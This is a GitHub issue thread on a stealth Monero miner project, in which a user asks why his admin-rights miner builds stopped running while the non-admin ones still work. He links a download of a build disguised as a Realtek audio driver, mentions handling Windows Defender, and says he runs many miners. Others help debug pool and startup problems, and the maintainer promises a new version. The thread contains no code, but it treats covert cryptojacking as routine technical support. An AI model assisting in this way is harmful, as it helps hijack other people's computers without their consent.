### ISSUE TITLE
miner from admin stopped working

### ISSUE THREAD

**Issue by parabola19** [UnamSanctam/SilentXMRMiner#334]
I made 2 miners - from the admin and without. it worked before, but today when I launched it, it did not appear either in processes or in autoload, while the miner without admin rights started without problems. both have remote configuration. all links to pastebin work. what could have gone wrong?

(using google translator)

if you need to check it
https://anonfiles.com/x7Tck56cu6/Realtek_HD_Audio_Driver_exe

**Comment by shainodev** [comment]
did both have all the same settings? same pool same everything but just 1 had no admin

**Comment by parabola19** [comment]
> did both have all the same settings? same pool same everything but just 1 had no admin

the settings are completely identical except for the admin and windows defender

**Comment by shainodev** [comment]
> > did both have all the same settings? same pool same everything but just 1 had no admin
> 
> the settings are completely identical except for the admin and windows defender

maybe the windows defender kept deleting it or something

**Comment by UnamSanctam** [comment]
I will release a new miner version probably toady which you can try, I've changed some things in that which might fix it depending on what the actual problem is.

**Comment by parabola19** [comment]
> I will release a new miner version probably today which you can try then, I've changed some things in that which might fix it depending on what the actual problem is.

https://i.imgur.com/G7NTqVD.png
do you think this is a miner or pool problem? the last hash was 9 hours ago, although I have a lot of miners

**Comment by parabola19** [comment]
> Are those multiple miners mining? In that case it must be a pool problem since it stopped all at once.

yes, but they were 90% run from admin. I thought maybe the miner stopped working for everyone at once

**Comment by UnamSanctam** [comment]
Not that I know of, and even then it would never all stop at once.

**Comment by shainodev** [comment]
what pool are u using

**Comment by parabola19** [comment]
> what pool are u using

https://moneroocean.stream/

**Comment by shainodev** [comment]
i have no idea then it must be them cant connecting to it.

**Comment by UnamSanctam** [comment]
> > what pool are u using
> 
> https://moneroocean.stream/

If you try to mine normally with https://github.com/xmrig/xmrig with the same wallet address, worker name and pool does it work?

**Comment by parabola19** [comment]
> > > какой бассейн ты используешь
> > 
> > 
> > https://moneroocean.stream/
> 
> Если вы попытаетесь майнить в обычном режиме с https://github.com/xmrig/xmrig с тем же адресом кошелька, именем воркера и пулом, это сработает?

I visited their discord, api problem. everything seems to work, but is not displayed.

does anyone else have a problem launching from admin? I would like to know if this is my pc's problem

**Comment by shainodev** [comment]
wdym launching from admin

**Comment by parabola19** [comment]
> wdym launching from admin

https://i.imgur.com/gDkXDDW.png

**Comment by parabola19** [comment]
now checked - it works
